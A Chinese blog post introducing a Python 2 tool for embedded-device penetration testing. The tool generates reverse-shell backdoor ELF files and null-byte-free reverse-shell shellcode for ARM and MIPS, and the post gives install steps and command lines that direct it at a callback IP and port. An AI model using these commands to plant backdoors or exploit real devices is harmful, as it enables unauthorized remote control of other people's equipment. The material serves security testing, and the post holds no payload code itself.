嵌入式设备后门与shellcode生成工具

嵌入式设备后门与shellcode生成工具,第1张

介绍

在嵌入式设备的渗透和漏洞挖掘过程中,遇到了许多问题。一个是一些设备没有telnetd或ssh服务来获得交互式shell,另一个是内存损坏漏洞(如堆栈溢出)通常是空字节截断,因此构造反向shell代码更麻烦,因此开发此工具是为了利用该漏洞。该工具基于PWN模块开发,目前使用python2语言

项目地址[

项目地址github

功能

该工具嵌入到设备的安全测试中。有两个主要功能:
1.生成各种架构的后门程序。后门程序是用反向shell汇编代码打包的,大小很小现在支持Armv5、Armv7、Armv8、mipsel和mips,仍在更新中
2.在攻击过程中生成各种架构的反向shell代码,且无空字节,这有助于攻击嵌入式设备上的内存损坏漏洞现在支持Armv5、Armv7、Armv8、mipsel和mips,仍在更新中

打包生成ELF

python2安装pwn模块

pip install pwn

​使用nuitka 打包py生成ELF

nuitka hackEmbedded_tool.py
mv hackEmbedded_tool.exe hackEmbedded_tool

尽可能将生成后门shellcode的模块文件放入python2的site-packages中

sudo cp ./generate_* {your_dir}/site-packages
sudo cp ./extract_shellcode.py {your_dir}/site-packages
sudo cp ./hackEmbedded_tool /usr/bin/

可以在python终端下使用sys.path查找site-packages路径

Python 2.7.17 (default, Mar 18 2022, 13:21:42) 
[GCC 7.5.0] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import sys
>>> sys.path
怎么使用

要使用生成后门或反向shell汇编的机器码,需要指定ip地址、端口号、架构、endian(默认为armv7)

以下是生成不带空字节的反向shell机器码的示例

hackEmbedded_tool -reverse_ip 192.168.7.1 -reverse_port 444 -arch arm -endian little -exploit_shellcode 1


这是生成对应架构的后门文件的使用示列

hackEmbedded_tool -reverse_ip 192.168.7.1 -reverse_port 444 -arch arm -endian little -backdoor_file 1

使用-h可以查看命令提示

欢迎分享,转载请注明来源:内存溢出

原文地址: http://outofmemory.cn/langs/786411.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2022-05-05
下一篇 2022-05-05

发表评论

登录后才能评论

评论列表(0条)

保存